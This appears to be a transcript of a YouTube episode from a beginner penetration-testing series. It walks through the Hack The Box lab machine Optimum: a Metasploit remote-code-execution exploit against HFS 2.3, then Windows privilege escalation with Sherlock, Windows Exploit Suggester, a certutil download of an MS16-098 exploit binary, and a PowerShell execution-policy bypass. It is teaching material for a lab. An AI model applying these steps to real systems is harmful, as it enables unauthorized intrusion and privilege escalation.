What is up, everybody? Welcome to episode 7 of Pentesting for Noobs. Again, congratulations if you've made it this far. So this episode is going to be a refresher episode, meaning we're going to take all the knowledge that we've learned so far and apply it to a machine. Now that machine is Optimum. Optimum is a Windows machine that is on the easy side, which falls in line with everything we've done. So Optimum lives at 10.10.10.8. And in the last episode, I asked you to go ahead and give it a try. If you gave it a try and you're successful, awesome job. If you were not able to succeed, that's okay as well. That's exactly what this video is here for. So not only if you were successful or unsuccessful, but for everybody to learn, my methodology and how we should be attacking these boxes and how we can apply it realistically. So before we do that, again, always, please do hit the like button if you love this channel, the subscribe, the bell as well, and get notifications for future live streams and future videos. With that being said, go ahead and hit that play button on your machine and let's get scanning. Once you've got your scan ready, let's dive into the next section of the video and cover what we've got. All right, so our scan is back and we are lucky again in 2 videos, I do believe, where we only have 1 port open. So again, we have port 80 open here, which means that our attack vector outside of something like port knocking is going to be through port 80. So because it's through port 80, we are very direct in what we can do with our attacks. So right off the bat, we can see here that we have this HTTP file server, HTTPD 2.3, also known as HFS 2.3. Okay, so we could take this information and go to Google, say, hey, is there HFS 2.3? Is there some sort of exploit for it? We can use Searchsploit and search for it. But before we do any of that, I do want to go out to the web page and just make sure we know what we're working with here. So we come to this web page and there's no files in this folder. We understand that it's a file server, so we should have the ability to upload files, download files, but there's nothing here. And at the moment, we aren't logged in as anybody either. So we could go to log in and attempt to log in and see if there are any username credentials that we can access with. We could go to Google here and say, hey, is this HFS file server, does it have a default credentials? And we can look that up. Now, HFS by default does not have default credentials. Those are actually set up when you set up HFS. So in terms of security, that's a good thing. But you're going to find here that there is some not so good stuff going on as well. If we actually look at this link here, the HTTP file server 2.3, you can see at the bottom that Rigetto.com pops up. So Rigetto is the vendor. This is who makes this file server 2.3. We can come down here and just go to Searchsploit and just say Searchsploit Rigetto and see what's there. And you can see immediately that, well, there is a Metasploit module, right? There's some Python for 2.x, but 2.3 is showing up repeatedly. So if we were to go out to the interwebs and do something like Rigetto HFS, look at that, 2.3 exploit, just Google knows. Google knows what we're after. So there is a exploit-db. We can check that out. There's a Rapid7, our favorite, because we can just use the pre-existing Metasploit module if we want to. And we come through here, you can see that Rigetto file server is vulnerable to remote command execution. Fantastic. This is what we want, right? On Windows XP, Windows 7, and Windows 8 is where it's been tested. Doesn't mean it's not other operating systems as well. And you come through here and we've got this as well. We can download this Python file and attempt to execute manually. But in this instance, we're just going to take what we know and we're going to take Metasploit and try to get a shell. So this looks like a winner for us, especially with remote code execution. So let's go into here and we'll just go and boot up Metasploit. And we're going to attack this machine. We don't know a lot about it. Let's go back to the scan and see. So the best guess here, the best OS guess is that it's a Windows Server 2012 R2. And you're seeing that come through quite a bit. So it's pulling down information that it really believes it's 2012 and even believes Windows 7 or Windows 8. So because of this, I think there's probably a high likelihood that this machine is going to be a 64-bit as opposed to a 32-bit. So we could try a 64-bit payload first. If it doesn't work, then we'll go with a 32-bit payload and just be safe. So let's go ahead and just search for Rigetto real quick. And then we'll say use exploit Windows HTTP Rigetto HFS exec. Okay, options. We're going to go ahead and set our host to 10.10.10.8. The rest of it looks okay at this point. And then the exploit target is automatic. Let's go ahead and just show targets and see what they're picking. So all they have is automatic. All right, let's go ahead and set the payload to Windows x64 interpreter reverse underscore TCP options. Okay, set our L host and we'll set it to tunnel 0. Now this is a trick actually sent in by a user. So if you are watching this and you're the one who told me about this, thank you. This is actually a really cool trick. You can just set your interface, which if I ever read, I would have noticed that instead of typing in your address or having to go back and look for the IP address that you're working with. So interface here, port, and then we can just go ahead and run this bad boy and see what happens. And boom, right away, we get an interpreter session. So that's awesome. Let's go ahead and hit enter. It's going to take a second, I think, with this cleanup trying to go on. Okay. So we can say sysinfo, and we are 64-bit interpreter on 64-bit architecture. That is where we want to be. So now let's go ahead and look at the get UID. Well, the get UID is cost us, so we're going to have to do some privesc. So a couple ways we could privesc. We could try say get system. That didn't work. Okay, we can background and we can say search for suggester. Okay, then we can just use post multi recon local exploit suggester. Now, if I'm going through this fast, it's because I've expected you to know this by now, right? All these things we're seeing so far, I have shown you. Let's go ahead and say options on this. We're gonna have to set a session. Set session to 1. And then we're gonna run this, but then we're gonna automatically cancel it. So let's Control C. Actually, no, let's run it, sorry. I was thinking ahead, but that's fine. So we're gonna run this and let's see if it collects anything. Now, it should be noted that on 64-bit machines, it's not easy to gather local exploits from the exploit suggester. It's better for 32-bit machines. So you're gonna see here that it's going to try some of these and none of them are coming through. Okay, that's not a big deal. So we're gonna have to do manual post-exploitation. And this is something we haven't covered, but I have thrown out in the past that there are scripts out there on both the Windows side and the Linux side. We covered Linux, we talked about the scripts that are out there. So this is where you should have gotten this far with everything we've learned, right? And you have the tools and the mindset by now to know, hey, okay, how do I get better? How do I escalate these privileges? And we can say, okay, well, we're gonna have to go to Google. Go to Google, we could say, okay, Google, Windows privilege escalation. Now there is a great guide out there by Fuzzy Security. It is considered pretty much the Bible when it comes to privesc. Now we can go through and we can check all of this information that comes through here. Lucky for us, some people have scripted some of this, but there are still very manual methods to doing this, especially when we're talking just gathering some of this information. It can be automated, like gathering system info and looking for different items based on that or based on packages. But some of this is just really, you're going to have to look through it and, see what kind of information comes back and if anything stands out, or maybe there's programs that are running that you can escalate with. So we haven't dove too deep into this yet, and that's okay. Privilege escalation, this kind of stuff isn't hyper realistic. There's some realism. When you're doing pen test, the majority of the time, your priv esc isn't going to fall from any of this kind of things. It doesn't mean it can't happen. It just means it's not likely. Priv esc is usually on the Active Directory side, and it's not related to most of this stuff. This is better for capture the flag type things, doing the hack the box machines or any other type of lab environment like this, where they demonstrate the ability to use exploits and privilege escalation. Now, there is a tool that I want to point out that I think is really good, and it's been updated recently, but we're still going to use the older version. We could say Sherlock, and this is written by Rostamouse. So if you type in Sherlock Rostamouse, you can see it's a PowerShell script here. So we can go ahead and just clone or download this whole thing. And we can see also that it quickly looks for the following items. So all of these different privilege escalation vulnerabilities on Windows. The other thing that we could do too is we could go into our session again, and we can just say shell, or we could just say sysinfo, right? And we could see that we're on build 9600. We could say Windows 2012 R2, do a copy on that. And we could go to Google and just say, hey, is there privilege escalation for this? And first one here is this MS16032 that shows up. Now, okay, MS16032, and this is for Windows 7 through 10, 2008 through 2002, 32 and 64-bit. So it needs a race condition to succeed. There must be 2+ CPU cores. If testing in a VM, just make sure they add a core. Okay, so there is a PowerSploit exploit, or PowerShell. I think it might be part of the PowerSploit package, but I'm not sure. Definitely PowerShell exploit that's available for us. There is also, we can search this as well. We can background and just say search MS16032, something like this. And this does exist here. So let's go ahead and copy this. And we'll just say use and paste. So again, the OS information is important. The build information is important. Same thing with Linux. One of the first things you're going to be looking for outside of like looking at the history or looking at pseudo privileges, you're going to want to look at on a Linux machine, the type of OS that's running, the build that's running, and see if there are any exploits or priv-esc exploits specifically for that OS and that architecture. So this is one of the kind of the basic 101s of what to look for. And even if you look back at this fuzzy security guide, you could see that they're doing information gathering. The very first step that they do is they gather the OS name and the OS version. So super important information here. Now let's go ahead and type options, and let's set the session here to 1, and then you see the target down there is x86. We know we are on x64, so let's show targets, and we'll set target to 1. Okay, now I'm going to run this, and then I'm going to kill it. Let's see if I can kill it. Okay, options. So again, it pulls the lhost. I actually tried this with setting my interface first, and it's still messed up. So we just have to kill it here, come back, set the lhost to our tunnel 0, and let's go ahead and pick a new L port. Let's set the L port to we'll do 443 here, and we'll try running this. Now this exploit is iffy. It works sometimes, and it works sometimes not. So we'll see if we can get this to work. If not, we'll go back and we'll do the more manual method of getting it to work. So I've gotten this to pull once or twice, but in the end, it doesn't really like executing this script. So we'll see how this works. Okay, so we ran it twice here, and for me, it didn't work. Maybe you got lucky and it works for you. But let's go ahead and take a look at the more manual method that we can use, and we'll go from there. Okay, so I'm going to show you two different tools that we can use to do privilege escalation and numeration. The first one that we covered already is this Rasta Mouse Sherlock. So let's go ahead and just click on this Sherlock.ps1. And then what I'll do is we'll just take the raw version, Control A, Control C. This will just be the easiest way. We'll come into our terminal here, and then I'm going to open up a new tab. And then we will just say gedit, and we'll just call this, you can call it whatever you want. I'm going to call it sure.ps1 just for easy naming reference. Go ahead and Control V here, paste this in and save it. Okay, now on our end over here, what we're going to do is we are going to come back to our machine. We're going to go into our sessions, and then let's type in shell. Okay, we're on our desktop. That's fine. Let's go ahead and grab that file. So let's load up the file here. We're going to do our Python simple HTTP server with the -m, of course, and then try it, and port 80, let that run. And then we're going to use certutil. All this should be refresher information, right? Certutil, we're going to do URL cache, and then a file of HTTP, and then our IP, which I honestly don't know the IP address. I think it's .8. We'll do ifconfig. That's .14 actually. .14 /sure.ps1. We'll just call this sure.ps1. Okay, if we say dir, we should see that, okay, Sherlock.ps1 is here. So here's what we're going to do. We are going to execute this file, and we're just going to say something along the lines of PowerShell.exe. We'll say execution bypass. All we're doing is bypassing the execution policy. This is something, if you're not familiar with PowerShell, that's just there to prevent us from running files that perhaps could be malicious. It's not really anything other than a protection that we just turn off. So we're going to turn that off here, and then we're going to run a command. And the command that we're going to run is something along the lines like this. We are going to say import module, and then we're going to import good old sure.ps1 here. And then we're going to run the command find all vulns, which is part of the Sherlock template. Do this, execute, and there we go. So come through here, Sherlock executes, and you can see that it's starting to search for vulnerabilities. You can see not vulnerable, blah, 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 all the way down, scroll through. Okay, MS16032 shows up again and appears vulnerable. 034, 135, and it has Nessus agent on it as well, not vulnerable. Okay, so there's these three here as potential possibilities. We've already identified MS16032 and tried with Metasploit. It did not work. This machine is vulnerable to MS16032. However, it is a little beyond our scope. It gets a little advanced in how we need to exploit it. And I think that it's possibly even a later episode that we can kind of start getting into that stuff. It's very PowerShell heavy and involves a little bit of modification and downloading. So I'm going to avoid that method, but lucky for us, there are a couple other methods that we can use. Now, this was just one item here, right? So we're using this. We found 3 potential vulnerabilities that might work. Let's look at another thing that we can do as well. Now, there is a great tool out there. If we go to the Googles, we go to google.com, and we just say, we're going to search for Windows Exploit Suggester. And this GDS security right here, let's go ahead and just copy this. And we're just going to clone this whole thing here. Copy this, come over here, and we're going to do a git clone on this item. And we'll cd into the Windows exploit suggester ls. Okay, so if you look at the file description down here, you can see that we need to run this update. So we'll go ahead and update it. So we'll say Python Windows exploit suggester update like this. Okay, now you see that it wrote an Excel file out for us. So now we're going to actually use that Excel file. Actually, let's do one thing first. So in order to run this, we need the Excel file that it just provided, the database, and the system info. So we got to go ahead and type in system info on our shell. So we go back to our shell and we type in system info. We need to copy all of this information that just came out right here, copy, and then we can just put this into a text file, call it gedit sysinfo.txt, paste that, and save it. Okay, so looking at the syntax, we need to run Python database, something like this. We'll copy it, so we'll just say Python, paste this. Our database is this 2019 right there, should auto tab complete. Next thing we need is we need our system info text file. So -- system info and then sysinfo.txt, run that. Now it's going to determine if there's any types of vulnerabilities based on this. Let's make this a little bit bigger. And if we look through this, we can see anything that lights up like a Christmas tree in green is potentially vulnerable, right? So it's searching through and it's looking through all of these, right? And let's see if we scroll down the bottom. Okay, it does pick up, again, it picks up 032 here. Another potential exploit is right here. This MS16098, second one down the list for us, thankfully. We wouldn't have gone too far. Now, the nice thing too is it provides us a exploit DB link. So we can actually just open the link, go right to it, and download this exploit here. So it's going to save into our downloads in a C format. So let's go ahead and open up a new tab here, and I'm going to cd back into downloads. And then we have to GCC this. So we're going to GCC for 1020-c here. We'll just do an output of ex.exe. Ooh, we've got a fatal error. Okay, let's take a look at that fatal error. We don't have a windows.h file. Let's see if we need a windows.h. Okay, we can actually also download the binary right here, it looks like. So let's just copy this, and we might actually even have it on our computer as well. So windows.h, we could download that and put that into our compiler, but let's see if we can just do a locate on 41020 and see if there's an exe already built in. There's not, but we can go ahead and just download it. We can search exploit as well, just to make really quick sure that we don't have it. It is MS16, not 12. 16098. And we've got the C file already downloaded here, which you could have grabbed, and then the .txt. Okay, let's go ahead and just paste here and download this, and we'll save this. Okay, and from here, we're going to kill out this and go ahead and open up our Python web server in this folder because we just downloaded it to the HTTP folder. Sorry, I am backwards. Simple HTTP server port 80. Okay, so now we're hosting up that file. Let's go ahead and put it onto this machine. So we're still on a shell here. We're going to do certutil again. We'll do URL cache again, file transfer. And we said we were at 14.14 for me. And then this one was called 41020.exe. And we'll call it sh.exe. Okay, ls, you can see, sorry, tur. I'm losing my mind today, guys. Okay, we try to run sh.exe. And let's see what happens. Okay, and it's not working. Why is it not working? Because if you look up in the upper right-hand corner, and you look at this, actually, you see 0 bytes actually transferred over because we never really transferred over the file. We just transferred over a placeholder. Firefox has determined that this was malware. Let's go ahead and just hit open. Come back. We're actually going to have to kill this shell here. And then we're going to go ahead and say shell one more time. We'll do our certutil again. URL cache file. And this may have actually worked for you if you didn't get caught by the Microsoft or the Firefox here. You can do 10.10.14.14 / and this is 41020.exe. Give it a sh.exe. We'll just overwrite that file if we can. Do a dir now, and you see we actually have an executable. Do sh.exe. And who am I? We are authority system. So we have rooted this machine. Okay, that was a bit of a clusterfuck. And you could see me struggle at times as well. This one was not. Now this one is fully capable of being rooted from everything we've learned in the past, though it is not completely easy to do so, right? Up until this point, I've given you the tools necessary to be successful, and I'm guessing most of you probably got at least the path into user. Now, we have relied on some things like the local exploit suggester for Windows, and we have done some privesc with Linux, but we never really touched on the methodology needed for the Windows side of things. That is a little bit of the work harder aspect of pen testing, is to kind of try to figure this out on your own. And hopefully some of you got the idea to go in and look for some of these exploits. Now, again, it's probably time consuming, right? If you come through and you see the list of just different types of exploits that are possible. And again, there are more than one ways to skin a cat here. The 032 would work, and there are some PowerShell modules that we could use against it. Now, again, it's a little more complicated. I do welcome you to try it and see if you can get it to work, but that's something that we will work on in the future. But in this video, we did manage to do privilege escalation with the Windows machine and use a couple of new tools to do so, right? We learned about the fuzzy security, and this is a great guide that anybody should keep in their back pocket, especially if you're doing hack the box style machines. We learned about Rasta Mouse and the Sherlock, which has actually been deprecated. I'm not sure what they've moved on to, but it's called Watson now. Everybody's new thing is to write in C or C# and then make these SLN files, and you have to compile them yourself into executables. And this is actually in .NET. So everybody's moving away, it seems like, from PowerShell now and into these. This is the new hype. But we're not going to use Watson today. The Sherlock was plenty good, and also this Windows exploit suggester was actually pretty good as well. So a couple of new tools that we learned along the way. So until next time, I really do hope you learned something out of this video, and I hope to see you in the next episode. And of course, again, if you do like this video, please do hit the like, subscribe, and the bell, and shoot some love down in the comments. Thank you very much, and I will see you in the next video.